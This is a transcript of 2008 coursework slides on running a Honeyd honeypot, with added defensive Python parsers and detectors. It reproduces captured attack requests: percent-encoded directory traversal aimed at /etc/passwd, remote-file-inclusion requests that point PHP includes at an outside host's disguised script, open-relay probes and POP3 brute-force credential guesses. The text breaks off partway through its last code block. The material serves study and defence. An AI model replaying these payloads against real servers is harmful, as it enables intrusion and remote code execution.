Using Honeypots with Honeyd

Coursework on implementing honeypots with Honeyd

Published in: Technology
Transcript

  • 1. Using HoneyPots with Honeyd. Pedro Pereira, Ulisses Costa. Cryptography and Information Systems Security, 18 December 2008. (Slide footer, repeated on every slide: Pedro Pereira, Ulisses Costa, Using HoneyPots with Honeyd)
  • 2. Outline: 1 Introduction (HoneyPots; Honeyd). 2 Log (Honeyd main log). 3 SMTP (open mail relay). 4 HTTP (webcollage/1.135a; directory traversal; Morfeus Scanner: WebCalendar, Mambo/Joomla, preventing Morfeus Scanner attacks; attack on POP3; SSH). 5 The threat.
  • 4. What are HoneyPots? Programs (or whole systems) that emulate services with known vulnerabilities; traps set to detect, study or divert attacks. Nothing legitimate should ever talk to them, so every connection they receive is suspect by definition.
  • 5. Types of HoneyPots. By level of interaction: high-interaction (a real system that can be fully compromised, so it must be isolated) and low-interaction (emulated services, which is what Honeyd provides). By modus operandi: server-side (waits to be attacked) and client-side (actively visits malicious servers).
  • 7. Honeyd: creates virtual hosts; each host is configurable; supports more than 1000 personalities (OS fingerprints taken from the Nmap database, so a virtual host answers scans like the chosen OS); many dozens of scripts for emulating services.
  • 8. Honeyd configuration. farpd answers ARP requests for the honeypot address so that traffic for 192.168.1.50 reaches the machine running Honeyd:
    bash> farpd 192.168.1.50 -i eth0
    # File: /etc/default/honeyd
    # Defaults for honeyd initscript
    # Run as a daemon
    RUN="yes"
    # Network interface on which honeyd listens for requests
    INTERFACE="eth0"
    # Network that honeyd simulates
    NETWORK=192.168.1.50
    # Option set
    # -c hostname:port:username:password
    OPTIONS="-c localhost:12345:username:password"
  • 9. The -c hostname:port:username:password option makes Honeyd report partial statistics to a collector. Generating the statistics with honeydstats:
    bash> honeydstats --os_report /etc/honeypot/os --port_report /etc/honeypot/port --spammer_report /etc/honeypot/spam --country_report /etc/honeypot/country -f /etc/honeypot/honeydstats.conf -l localhost -p 12345
    # File: /etc/honeypot/honeydstats.conf
    # honeydstats configuration file
    username:password
  • 10. HoneyPot configuration (1/2). The default actions make unconfigured TCP/UDP ports answer with a reset (they look closed rather than filtered) and drop ICMP; each configured port runs an emulation script that receives the connection's addresses and ports:
    # File: /etc/honeypot/honeyd.conf
    # Honeypot configuration
    create win2k
    set win2k personality "Microsoft Windows 2000 SP2"
    set win2k default tcp action reset
    set win2k default udp action reset
    set win2k default icmp action block
    set win2k uptime 3567
    add win2k tcp port 21 "sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 23 "perl /usr/share/honeyd/scripts/unix/linux/suse7.0/telnetd.sh"
    add win2k tcp port 25 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-smtp.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 80 "sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 110 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-pop3.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 143 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-imap.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 389 "sh /usr/share/honeyd/scripts/win32/win2k/ldap.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 5901 "sh /usr/share/honeyd/scripts/win32/win2k/vnc.sh $ipsrc $sport $ipdst $dport"
    add win2k udp port 161 "perl /usr/share/honeyd/scripts/unix/general/snmp/fake-snmp.pl public private --config=scripts/unix/general"
  • 11. HoneyPot configuration (2/2)
    add win2k udp port 137 proxy $ipsrc:137
    add win2k udp port 138 proxy $ipsrc:138
    add win2k udp port 445 proxy $ipsrc:445
    add win2k tcp port 137 proxy $ipsrc:137
    add win2k tcp port 138 proxy $ipsrc:138
    add win2k tcp port 139 proxy $ipsrc:139
    add win2k tcp port 445 proxy $ipsrc:445
    bind 192.168.1.50 win2k
    Monitoring the NETBIOS/SMB ports properly was not feasible (emulating them is far too complex), so the decision was to proxy those connections back to their source: $ipsrc is the attacker's own address, so a scanner probing these ports ends up talking to itself. Starting our HoneyPot:
    bash> /etc/init.d/honeyd start
  • 13. Files: /var/log/honeyd.txt (SMTP, Telnet, IMAP and POP3 service scripts); /var/log/honeypot/web.log (HTTP); /var/log/honeypot/honeyd.log (Honeyd main log).
  • 15. Format of the file /var/log/honeypot/honeyd.log. Fields: Date, Protocol, T, SrcIP, SrcPort, DstIP, DstPort, Info, Comment. T is the record type: S = start of a connection, E = end of a connection, - = a single packet that Honeyd did not track as a connection (a TCP probe that was reset, an ICMP or a UDP datagram). The comment in square brackets is the passive OS fingerprint of the source.
    ...  tcp(6)   S  88.44.123.210    3637   ...  139                  [Windows XP SP1]
    ...  tcp(6)   S  82.155.0.49      22617  ...  139
    ...  tcp(6)   E  82.155.1.160     4399   ...  445: 0 0
    ...  tcp(6)   -  82.155.122.18    61582  ...  139: 40 R
    ...  icmp(1)  -  80.236.5.27             ...: 3(13): 56
    ...  tcp(6)   -  82.154.64.174    34507  ...  445: 40 RA
    ...  tcp(6)   -  124.8.74.33      1806   ...  25: 70 FPA           [Windows XP SP1]
    ...  tcp(6)   -  168.167.152.228  58274  ...  445: 52 FA           [Windows XP SP1]
    ...  tcp(6)   -  168.167.152.228  58274  ...  445: 52 FA
    ...  tcp(6)   -  82.155.57.245    58274  ...  445: 52 PA           [Windows XP SP1]
    ...  tcp(6)   -  193.136.19.149   58274  ...  445: 52 PA
    ...  tcp(6)   -  88.175.73.149    4332   ...  139: 40 R            [Windows XP SP1]
    ...  tcp(6)   -  82.155.137.139   1230   ...  445: 40 A            [Windows XP SP1]
    ...  tcp(6)   -  82.155.7.176     2794   ...  445: 40 A
    ...  tcp(6)   -  82.155.116.238   3578   ...  23: 60 S             [Linux 2.6.1-7]
    ...  tcp(6)   -  124.207.41.198   48804  ...  23: 40 S
    ...  udp(17)  -  192.168.1.254    67     ...  68: 298
    Date is in the format 2008-12-15-22:59:03.4039. DstIP (elided above with "...") is always the same here: 192.168.1.50. For "-" records the info field is the packet size followed by the TCP flags (S, A, R, F, P); for ICMP it is type(code) and size.
  • 16. Format of the file /var/log/honeypot/honeyd.log (continued)
    2009-01-01-05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
    2009-01-01-05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008
    For TCP and UDP not every packet is recorded, which would be far too verbose; when a connection ends (E) only the amount of data transmitted is logged: bytes received by the honeypot, then bytes sent by it.
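The parser below is an added example written for this page, not code from the presentation or from Honeyd. It assumes the field layout shown on slides 15 and 16 (date, protocol, record type, source, destination, an optional info field after a colon, an optional fingerprint in brackets) and runs over constructed sample lines modelled on those slides. It keeps the passive OS fingerprint, sums the byte counts from E records and flags sources that touch several distinct ports as scanners; the threshold of three ports is a tuning assumption.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, Optional, Tuple

# One honeyd.log record, field order as on the slides:
#   date proto(num) T src [sport] dst [dport][: info] [[os fingerprint]]
# T is S (connection start), E (connection end) or - (untracked packet).
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}-\d{2}:\d{2}:\d{2}\.\d+)\s+"
    r"(?P<proto>tcp|udp|icmp)\(\d+\)\s+"
    r"(?P<kind>[SE-])\s+"
    r"(?P<src>[\d.]+)\s+(?:(?P<sport>\d+)\s+)?"
    r"(?P<dst>[\d.]+)(?:\s+(?P<dport>\d+))?"
    r"(?::\s*(?P<info>[^\[]*?))?\s*"
    r"(?:\[(?P<os>[^\]]+)\])?\s*$"
)


@dataclass
class Event:
    ts: str
    proto: str
    kind: str            # 'S', 'E' or '-'
    src: str
    sport: Optional[int]
    dst: str
    dport: Optional[int]
    info: str            # "recv sent" for E, "size flags" for TCP "-", "type(code): size" for ICMP
    os: Optional[str]    # passive fingerprint of the source, when Honeyd printed one


def parse_line(line: str) -> Optional[Event]:
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    g = m.groupdict()
    return Event(g["ts"], g["proto"], g["kind"], g["src"],
                 int(g["sport"]) if g["sport"] else None,
                 g["dst"], int(g["dport"]) if g["dport"] else None,
                 (g["info"] or "").strip(), g["os"])


def connection_bytes(ev: Event) -> Optional[Tuple[int, int]]:
    """For an E record: (bytes the honeypot received, bytes it sent)."""
    if ev.kind != "E":
        return None
    parts = ev.info.split()
    return (int(parts[0]), int(parts[1])) if len(parts) == 2 else None


def summarize(lines: Iterable[str], scan_threshold: int = 3) -> Dict[str, dict]:
    """Per-source view of the log: distinct (proto, port) pairs touched, last OS
    fingerprint seen, bytes exchanged, and a scanner flag once a source has
    probed at least scan_threshold distinct ports (threshold is an assumption)."""
    per_src: Dict[str, dict] = defaultdict(
        lambda: {"ports": set(), "os": None, "rx": 0, "tx": 0, "events": 0})
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue                      # blank line, banner or corrupt record
        s = per_src[ev.src]
        s["events"] += 1
        if ev.dport is not None:
            s["ports"].add((ev.proto, ev.dport))
        if ev.os:
            s["os"] = ev.os
        b = connection_bytes(ev)
        if b:
            s["rx"] += b[0]
            s["tx"] += b[1]
    for s in per_src.values():
        s["scanner"] = len(s["ports"]) >= scan_threshold
    return dict(per_src)


# Constructed sample modelled on the records shown on the slides (not a real log).
SAMPLE_HONEYD_LOG = """\
2008-12-15-22:59:03.4039 tcp(6) S 88.44.123.210 3637 192.168.1.50 139 [Windows XP SP1]
2008-12-15-22:59:05.1200 tcp(6) - 88.44.123.210 3638 192.168.1.50 445: 40 S
2008-12-15-22:59:06.2210 tcp(6) - 88.44.123.210 3639 192.168.1.50 23: 40 S
2008-12-15-23:00:10.0001 icmp(1) - 80.236.5.27 192.168.1.50: 3(13): 56
2009-01-01-05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
2009-01-01-05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008
2008-12-15-23:01:00.0000 udp(17) - 192.168.1.254 67 192.168.1.50 68: 298
"""

if __name__ == "__main__":
    for src, s in summarize(SAMPLE_HONEYD_LOG.splitlines()).items():
        print(src, sorted(s["ports"]), s["os"], s["rx"], s["tx"],
              "SCANNER" if s["scanner"] else "")
```

Run it against the real file with `summarize(open("/var/log/honeypot/honeyd.log"))`; a source marked as a scanner with a fingerprint of a desktop Windows version is the usual signature of an infected home machine sweeping for SMB.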
  • 18. SMTP is the protocol for submitting and relaying messages (client to server and server to server); to retrieve messages from a mailbox we use POP3 or IMAP.
  • 19. SMTP HoneyPot (figure).
  • 20. The EHLO command in SMTP: the command with which a client identifies itself, and in reply to which the server announces the ESMTP extensions it supports.
  • 21. The EHLO command in SMTP, as answered by the honeypot's emulated Exchange server:
    S: 220 bps-pc9.local.mynet Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sex Jan 9 22:10:11 WET 2009
    C: EHLO windows
    S: 250-bps-pc9.local.mynet Hello [12]
    S: 250-TURN
    S: 250-ATRN
    S: 250-SIZE
    S: 250-ETRN
    S: 250-PIPELINING
    S: 250-DSN
    S: 250-ENHANCEDSTATUSCODES
    S: 250-8bitmime
    S: 250-BINARYMIME
    S: 250-CHUNKING
    S: 250-VRFY
    S: 250-X-EXPS GSSAPI NTLM LOGIN
    S: 250-X-EXPS=LOGIN
    S: 250-AUTH GSSAPI NTLM LOGIN
    S: 250-AUTH=LOGIN
    S: 250-X-LINK2STATE
    S: 250-XEXCH50
    S: 250 OK
    Clients identify themselves with domain names that are not real (here simply "windows").
  • 22. Spam on SMTP servers (figure).
  • 23. Solutions: check that the host name given in EHLO resolves in DNS. Caveat: RFC 5321 (section 4.1.4) allows a server to verify the EHLO argument but forbids refusing a message on that basis alone, so treat a non-resolving EHLO as one signal in a spam score, not as a hard reject; the hard reject belongs at RCPT TO, for recipients outside your own domains.
  • 25. Attacks: open-relay probes. The scanner tries to send a message through the honeypot to a mailbox it controls; if the message arrives, the host is an open relay. The HELO argument and the subject carry the address being tested:
    HELO 82.155.248.223
    MAIL FROM:<jk9l3g4jle@yahoo.com>
    RCPT TO:<sseenndd1201@yahoo.com.hk>
    DATA
    Subject: Super webscan open relay check succeded, hostname = 82.155.248.223
    2008-12-11-09:45:27.9566 tcp(6) S 124.11.193.219 2774 192.168.1.50 25 [Windows XP SP1]
    2008-12-11-09:46:33.6989 tcp(6) E 124.11.193.219 2774 192.168.1.50 25: 178 920
  • 26. Attacks: the same probe repeated from another source over several hours (the E records with 0 bytes received are connections that read the banner and left):
    HELO 82.155.251.32
    MAIL FROM:<gt48m7g3k6f@yahoo.com>
    RCPT TO:<sseenndd1201@yahoo.com.hk>
    DATA
    Subject: Super webscan open relay check succeded, hostname = 82.155.251.32
    2008-12-23-12:18:11.3939 tcp(6) S 114.44.42.34 2748 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-12:18:11.3953 tcp(6) S 114.44.42.34 2750 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-12:18:12.1966 tcp(6) E 114.44.42.34 2750 192.168.1.50 25: 0 116
    2008-12-23-12:18:13.1996 tcp(6) E 114.44.42.34 2748 192.168.1.50 25: 0 232
    2008-12-23-12:21:55.1773 tcp(6) S 114.44.42.34 3347 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-12:21:57.1324 tcp(6) E 114.44.42.34 3347 192.168.1.50 25: 0 232
    2008-12-23-14:06:30.5003 tcp(6) S 114.44.42.34 1634 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-14:06:30.5023 tcp(6) S 114.44.42.34 1635 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-14:06:43.0390 tcp(6) E 114.44.42.34 1635 192.168.1.50 25: 177 335
    2008-12-23-14:06:51.4612 tcp(6) E 114.44.42.34 1634 192.168.1.50 25: 177 418
  • 27. Attacks: a relay attempt carrying a full message (note the forged Received header, the empty display name and the multipart body, all typical of spam tooling):
    HELO 82.155.103.147
    MAIL FROM:<ttc585ttc585@yahoo.com.tw>
    RCPT TO:<vjd39hww@yahoo.com.tw>
    DATA
    Received: from ([145.200.201.114]) by 82.155.103.147 id <9624303-98482>; Tue, 06 Jan 2009 21:16:04 -0100
    Message-ID: <w58$6a4j1fqc6q@ocjc8ujvz>
    From: "" <ttc585ttc585@yahoo.com.tw>
    To: <vjd39hww@yahoo.com.tw>
    Subject: BC_82.155.103.147
    Date: Tue, 06 Jan 09 21:16:04 GMT
    MIME-Version: 1.0
    Content-Type: multipart/alternative; boundary="----=_NextPart_000_000D_01C2CC60.49F4EC70"
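The honeypot's emulated Exchange deliberately looks like it accepts anything, which is why the probes above keep coming back; a real MTA has to answer the RCPT TO differently. The session model below is an added example written for this page, not code from the presentation or from Honeyd, showing the relay decision the "Solutions" slide asks for. The local domain (local.mynet, from the banner on slide 21), the internal network allowed to relay and the flagging rules are assumptions; the probe transcript is constructed from the addresses on slide 25.

```python
import ipaddress
import re
from typing import List, Tuple

# Policy assumptions for this example: the domains this server accepts mail
# for, and the client networks allowed to relay to other domains.
LOCAL_DOMAINS = {"local.mynet"}
RELAY_NETWORKS = [ipaddress.ip_network("192.168.1.0/24")]

ADDR_RE = re.compile(r"<([^<>@\s]+)@([^<>@\s]+)>")
BARE_IP_RE = re.compile(r"[\d.]+")


class SmtpSession:
    """Relay-policy state for the EHLO / MAIL / RCPT / DATA phase of one session."""

    def __init__(self, client_ip: str, authenticated: bool = False):
        self.ip = ipaddress.ip_address(client_ip)
        self.authenticated = authenticated
        self.helo = None
        self.sender = None
        self.rcpts: List[str] = []
        self.flags: List[str] = []   # anomalies worth logging; never a reason to reject on their own

    def may_relay(self) -> bool:
        return self.authenticated or any(self.ip in net for net in RELAY_NETWORKS)

    def handle(self, line: str) -> str:
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.helo = arg.strip()
            # RFC 5321 s4.1.4: the argument may be checked, but a message must not be
            # refused on that basis alone.  A bare IP literal or a name without a dot
            # is a strong spam signal, so record it and carry on.
            if not self.helo or "." not in self.helo or BARE_IP_RE.fullmatch(self.helo):
                self.flags.append(f"suspicious HELO {self.helo!r}")
            return "250 OK"
        if verb == "MAIL":
            m = ADDR_RE.search(arg)
            if not m:
                return "501 5.1.7 Bad sender address syntax"
            self.sender = f"{m.group(1)}@{m.group(2)}"
            return "250 2.1.0 OK"
        if verb == "RCPT":
            m = ADDR_RE.search(arg)
            if not m:
                return "501 5.1.3 Bad recipient address syntax"
            domain = m.group(2).lower()
            # The relay decision: a recipient outside our domains is accepted only
            # from an authenticated client or from an internal network.
            if domain not in LOCAL_DOMAINS and not self.may_relay():
                self.flags.append(f"relay attempt to {m.group(1)}@{domain}")
                return "550 5.7.1 Relaying denied"
            self.rcpts.append(f"{m.group(1)}@{domain}")
            return "250 2.1.5 OK"
        if verb == "DATA":
            if not self.rcpts:
                return "503 5.5.1 No valid recipients"
            return "354 Start mail input; end with <CRLF>.<CRLF>"
        return "502 5.5.2 Command not implemented"


def run_dialogue(client_ip: str, commands: List[str],
                 authenticated: bool = False) -> Tuple[List[str], List[str]]:
    """Feed the client's commands to one session; return the replies and the flags raised."""
    session = SmtpSession(client_ip, authenticated)
    replies = [session.handle(c) for c in commands]
    return replies, session.flags


# The open-relay check from slide 25 (addresses as shown there; transcript constructed).
RELAY_PROBE = [
    "HELO 82.155.248.223",
    "MAIL FROM:<jk9l3g4jle@yahoo.com>",
    "RCPT TO:<sseenndd1201@yahoo.com.hk>",
    "DATA",
]

if __name__ == "__main__":
    for ip in ("124.11.193.219", "192.168.1.20"):
        replies, flags = run_dialogue(ip, RELAY_PROBE)
        print(ip, replies, flags)
```

From the scanner's address the RCPT is refused with 550 and DATA fails with 503, so the test message never leaves; from an internal address the same dialogue is accepted. The flags are what you would feed into the honeydstats spammer report or a score, not into the reply code.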
  • 29. HTTP hits (figure).
  • 31. User agent: webcollage/1.135a
    --MARK--,"Mon Dec 15 23:09:00 WET 2008","IIS/HTTP","92.240.68.152","192.168.1.50",56886,80,"GET http://www.morgangirl.com/pics/land/land1.jpg HTTP/1.0
    User-Agent: webcollage/1.135a
    Referer: http://random.yahoo.com/fast/ryl
    Host: www.morgangirl.com",--ENDMARK--
    An attempt to fetch an image through the HoneyPot. A request line with an absolute URI (GET http://host/...) is what a client sends to an HTTP proxy, not to a web server, so the HoneyPot has probably been picked up by a proxy scanner, listed as an open proxy, and this client is using it as one.
  • 33. Directory traversal. Also known as the dot dot slash attack (../); it exploits insufficient validation of the requested path to reach system files outside the web root. Decoded request:
    GET ../../../../../../../../../../etc/passwd HTTP/1.1
    As logged (percent-encoded, %2E = ".", %2F = "/"):
    --MARK--,"Sun Jan 4 05:20:57 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59706,80,"GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187",--ENDMARK--
  • 34. Directory traversal, variant with a three-dot first segment (.../), which some old servers treated as "parent directory":
    GET .../../../../../../../../../../etc/passwd HTTP/1.1
    --MARK--,"Sun Jan 4 05:20:58 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59711,80,"GET %2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187",--ENDMARK--
  • 35. Directory traversal, variant mixing backslash and slash (%5C = "\"), aimed at servers that filter only one separator:
    GET ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd HTTP/1.1
    --MARK--,"Sun Jan 4 05:21:02 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59727,80,"GET %2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187",--ENDMARK--
  • 36. Directory traversal, Windows-style variant with backslashes only:
    GET ..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1
    --MARK--,"Sun Jan 4 05:21:04 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59740,80,"GET %2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187",--ENDMARK--
  • 37. Directory traversal, absolute-path variant:
    GET //etc/passwd HTTP/1.1
    --MARK--,"Sun Jan 4 05:20:59 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59700,80,"GET %2F%2Fetc%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187",--ENDMARK--
  • 38. Conclusion: the traversal did not succeed against the HoneyPot, which is a low-interaction system with no real file system behind the emulated IIS; our HoneyPot answered every variant with "302 Object moved". The User-Agent shows the probes came from the Nmap Scripting Engine (NSE), all five within seven seconds.
  • 40. Morfeus Scanner: an automated scanner that searches for known PHP vulnerabilities, in the two cases below remote file inclusion (RFI) in popular web applications.
  • 41. Morfeus Scanner - WebCalendar (online calendar software). Vulnerability in the file send_reminders.php: its includedir parameter is used in a PHP include, so pointing it at a URL makes the server fetch and execute the attacker's file (a.gif here is typically a PHP script disguised as an image):
    --MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Morfeus Scanner
    Host: 82.155.248.190
    Connection: Close",--ENDMARK--
  • 42. Morfeus Scanner - Mambo/Joomla, very well known CMSs. The attacker tries to set the variable mosConfig_absolute_path, which index.php uses to locate the files it includes, to the same remote URL:
    --MARK--,"Wed Dec 24 16:07:34 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",55438,80,"GET /shop/index.php?option=com_registration&task=register//boutique/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Morfeus Scanner
    Host: 82.155.248.190
    Connection: Close",--ENDMARK--
  • 43. Preventing Morfeus Scanner attacks. One way to block requests coming from MFS is to add the following lines to the ".htaccess" file in the website's folder (mod_rewrite must be enabled):
    # Start of .htaccess change.
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} ^Morfeus
    RewriteRule ^.*$ - [F]
    # End of .htaccess change.
    This only keeps out clients that announce themselves; the User-Agent is attacker-controlled, so the real fix is to update the vulnerable application and to disable remote includes in PHP (allow_url_include = Off).
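Rather than matching a User-Agent, a detector should look at what the request does. The inspector below is an added example written for this page, not code from the presentation or from Honeyd; it covers both the directory-traversal probes of slides 33 to 37 and the remote-inclusion probes of slides 41 and 42. It percent-decodes repeatedly (so double encoding does not hide the dots), treats backslash as a separator as IIS does, resolves the ".." segments to see whether the path climbs above the web root, and flags any query parameter whose value is a URL. The list of sensitive file names and the URL schemes it looks for are assumptions; the request lines are taken from the slides' log records plus one benign request.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, unquote

SENSITIVE_FILES = ("etc/passwd", "etc/shadow", "boot.ini", "win.ini")   # demo list (assumption)
REMOTE_SCHEME_RE = re.compile(r"(?i)^(https?|ftp)://|^(php|data)://")


def decode_fully(s: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so a double-encoded
    %252E%252E%252F ends up as ../ just like a single-encoded request."""
    for _ in range(max_rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def normalize_path(target: str) -> Tuple[str, bool]:
    """Resolve the request target the way a lenient server would: decode,
    treat backslash as a separator (IIS does), drop the query, then walk the
    segments.  Returns (normalized path, True if it climbed above the root)."""
    path = decode_fully(target).replace("\\", "/").split("?", 1)[0]
    stack: List[str] = []
    escaped = False
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True          # more '..' than directories: outside the web root
        else:
            stack.append(seg)
    return "/" + "/".join(stack), escaped


def remote_include_params(target: str) -> List[Tuple[str, str]]:
    """Query parameters whose value is a URL: the Morfeus probes set includedir=
    or mosConfig_absolute_path= to http://host/file so that a PHP include() of
    that variable fetches and runs the attacker's script."""
    query = decode_fully(target).partition("?")[2]
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_SCHEME_RE.match(v.strip())]


def classify_request(request_line: str) -> Dict[str, object]:
    """Inspect one request line ('GET target HTTP/1.x') as logged in web.log."""
    method, _, rest = request_line.strip().partition(" ")
    target = rest.rsplit(" HTTP/", 1)[0]
    path, escaped = normalize_path(target)
    findings: List[str] = []
    if escaped:
        findings.append("traversal above web root")
    if any(path.lower().endswith(f) for f in SENSITIVE_FILES):
        findings.append("sensitive file requested")
    for name, value in remote_include_params(target):
        findings.append(f"remote include via {name}={value}")
    return {"method": method, "path": path, "findings": findings}


# Request lines from the slides' log records, plus one benign request.
SAMPLE_REQUESTS = [
    "GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1",
    "GET %2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd HTTP/1.1",
    "GET %2F%2Fetc%2Fpasswd HTTP/1.1",
    "GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1",
    "GET /shop/index.php?option=com_registration&task=register//boutique/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1",
    "GET /index.php?option=com_content&Itemid=1 HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        r = classify_request(line)
        print(r["path"], r["findings"])
```

The absolute-path variant (slide 37) does not escape the root, so it is reported only as a request for a sensitive file; a real server would serve /etc/passwd under the document root, which does not exist. That distinction is the reason to normalize before judging rather than to grep for "../".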
  • 45. Brute-force attempt on the POP3 server (figure).
  • 46. Brute-force attempt on the POP3 server, as recorded by the exchange-pop3 script (each record is one connection; the payload is the USER/PASS pair tried, roughly one guess per second):
    ...
    --MARK--,"Mon Dec 22 11:34:48 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54678,110,"USER root PASS root",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:49 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54729,110,"USER root PASS root1",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:50 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54731,110,"USER staff PASS staff",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:52 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,"USER root PASS 12345",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:53 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,"USER www PASS www",--ENDMARK--
    ...
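A parser for these service-script records, added here as an example for this page (not code from the presentation or from Honeyd). It assumes the record layout shown above, --MARK--, quoted date, service, source, destination, ports, quoted payload, --ENDMARK--, joins records whose payload spans several lines, and then does what the slide's graphs do by hand: counts attempts per source inside a time window and ranks the user names and passwords tried. The five-attempts-in-sixty-seconds threshold is a tuning assumption; the sample mixes the five records from the slide with constructed ones (a single attempt from another address, and an HTTP record that must be ignored).

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterator, List

# One record of the service-script logs (web.log and the POP3/SMTP scripts):
# --MARK--,"date","service","src","dst",sport,dport,"payload",--ENDMARK--
# The payload may span several lines in the real log, so records are joined first.
MARK_RE = re.compile(
    r'^--MARK--,"(?P<date>[^"]*)","(?P<service>[^"]*)","(?P<src>[^"]*)","(?P<dst>[^"]*)",'
    r'(?P<sport>\d+),(?P<dport>\d+),"(?P<payload>.*)",--ENDMARK--$', re.S)
CRED_RE = re.compile(r"USER\s+(\S+)\s+PASS\s+(\S+)")


def iter_records(text: str) -> Iterator[Dict[str, str]]:
    buf: List[str] = []
    for line in text.splitlines():
        if not buf and not line.startswith("--MARK--"):
            continue                              # junk between records
        buf.append(line)
        if line.rstrip().endswith("--ENDMARK--"):
            m = MARK_RE.match("\n".join(buf).strip())
            buf = []
            if m:
                yield m.groupdict()


def parse_ts(s: str) -> datetime:
    """'Mon Dec 22 11:34:48 WET 2008' -> datetime; the zone name is dropped
    because strptime's %Z only knows a handful of names."""
    parts = s.split()
    if len(parts) == 6:
        del parts[4]
    return datetime.strptime(" ".join(parts), "%a %b %d %H:%M:%S %Y")


def analyse(text: str, service: str = "POP3", threshold: int = 5,
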